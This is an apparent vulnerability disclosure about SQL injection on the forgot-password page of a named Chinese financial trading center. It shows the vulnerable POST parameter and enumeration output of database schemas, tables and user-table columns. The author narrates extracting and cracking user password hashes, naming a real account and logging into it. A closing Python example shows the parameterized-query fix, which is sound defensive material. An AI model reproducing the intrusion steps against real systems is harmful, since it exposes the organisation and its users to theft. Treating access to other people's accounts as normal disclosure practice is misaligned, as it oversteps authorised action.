SQL injection on the logon page of Nanning Financial Assets Trading Center exposes user data
Nanning Financial Assets Trading Center, a financial assets trading center with a well-known government (ZF) background, has SQL injection on its logon page that exposes user data and system data. As a financial enterprise, it should raise its security awareness.
Detailed description: SQL injection exists on the logon page of Nanning Financial Assets Trading Center and discloses user data and system data.
Injection point:
http://**.**/forget/forget_way.htm
Method:
POST
Injected parameter:
UserAccount=test
The injection yields the password hashes of the database management system's own user accounts (among them SYS and SYSTEM).
Enumerating the available databases (schemas):
Available databases [15]:
[*] APEX_030200
[*] APPQOSSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] NNFAE_JRZC
[*] NNGQ_LIST_PROD
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] WMSYS
[*] XDB
Enumerating the tables of the application schema:
Database: NNFAE_JRZC
[210 tables]
+------------------------+
| AREA                   |
| AUCTION_BID_RECORD     |
| AUCTION_BID_RECORD_HIS |
| AUCTION_HALL           |
| AUCTION_LATEST_BID     |
| AUCTION_LOG            |
| AUCTION_RESULT         |
| ........               |
+------------------------+
The remaining tables are omitted.
Key table information:
Database: NNFAE_JRZC
Table: UC_USERS
[31 columns]
+----------------------+--------------+
| Column               | Type         |
+----------------------+--------------+
| ACCOUNT              | VARCHAR2     |
| ACTIVITY_NAME        | VARCHAR2     |
| ACTIVITY_SORT_NO     | VARCHAR2     |
| AUDIT_REMARK         | VARCHAR2     |
| CREATOR_ID           | NUMBER       |
| EXCHANGE_ID          | NUMBER       |
| EXT1                 | VARCHAR2     |
| EXT2                 | VARCHAR2     |
| EXT3                 | VARCHAR2     |
| FORM_ID              | NUMBER       |
| GMT_AUDIT            | TIMESTAMP(6) |
| GMT_CREATE           | TIMESTAMP(6) |
| GMT_MODIFY           | TIMESTAMP(6) |
| ID                   | NUMBER       |
| INFO_APPLY           | VARCHAR2     |
| INSTANCE_ID          | VARCHAR2     |
| INTERFACE_QUERY_ATTR | VARCHAR2     |
| IS_DELETED           | VARCHAR2     |
| LAST_LOGIN_IP        | VARCHAR2     |
| LAST_LOGIN_TIME      | TIMESTAMP(6) |
| LIST_ATTR            | VARCHAR2     |
| LOGIN_ATTR           | VARCHAR2     |
| LOGIN_NUM            | NUMBER       |
| LOGIN_PWD            | VARCHAR2     |
| NAME                 | VARCHAR2     |
| PARENT_ID            | NUMBER       |
| PAY_PWD              | VARCHAR2     |
| QUERY_ATTR           | VARCHAR2     |
| REG_SOURCE           | NUMBER       |
| ROOT_USER_ID         | NUMBER       |
| STATUS               | NUMBER       |
+----------------------+--------------+
Only a handful of user records (the ACCOUNT, LOGIN_PWD and PAY_PWD columns) were extracted.
The password hashes look like plain MD5.
Cracking a few of them recovers passwords such as:
Test009 test002
Tried logging in: the account has to be activated first.
Switched to the account hxh5122.
Logged in, haha; this account is expected to have something detailed.
I stopped here and did not want to continue.
Solution:
Filtering the corresponding characters should not be difficult.
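The root cause behind this report and its fix, as an added example (not code from the trading center's application, whose back end is not shown): a forgot-password lookup that pastes the POSTed UserAccount value into the SQL text, beside a version that binds it as a parameter. It assumes an in-memory SQLite stand-in for the UC_USERS table, with constructed account rows and placeholder hash values.

```python
import sqlite3

# Constructed stand-in for the UC_USERS table named in the report: an
# in-memory SQLite table instead of the real database, with only the
# relevant columns and placeholder hash values (assumption: the real
# back end is not shown in the report).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UC_USERS (ACCOUNT TEXT, LOGIN_PWD TEXT, STATUS INTEGER)")
    conn.executemany(
        "INSERT INTO UC_USERS VALUES (?, ?, ?)",
        [("alice", "<md5-placeholder-1>", 1), ("o'brien", "<md5-placeholder-2>", 1)],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_account: str) -> list:
    # The forget_way.htm pattern: the POSTed UserAccount value is pasted into
    # the statement text, so a quote inside the value is parsed as SQL syntax.
    sql = "SELECT ACCOUNT FROM UC_USERS WHERE ACCOUNT = '" + user_account + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, user_account: str) -> list:
    # Bind variable: the value travels separately from the statement and can
    # never change its structure, whatever characters it contains.
    sql = "SELECT ACCOUNT FROM UC_USERS WHERE ACCOUNT = ?"
    return [row[0] for row in conn.execute(sql, (user_account,))]


def vulnerable_query_breaks(conn: sqlite3.Connection, user_account: str) -> bool:
    # True when the concatenated query fails to parse: a database syntax error
    # on a value that merely contains a quote is the classic sign of injection,
    # and the kind of response a scanner keys on.
    try:
        lookup_vulnerable(conn, user_account)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # A legitimate account name containing an apostrophe is enough to show the
    # difference: the concatenated query breaks, the parameterized one works.
    print(vulnerable_query_breaks(db, "o'brien"))    # True
    print(lookup_parameterized(db, "o'brien"))       # ["o'brien"]
    print(lookup_parameterized(db, "alice"))         # ['alice']
```

Character filtering, as the solution above suggests, only narrows the problem; binding the value as a parameter removes it for every character.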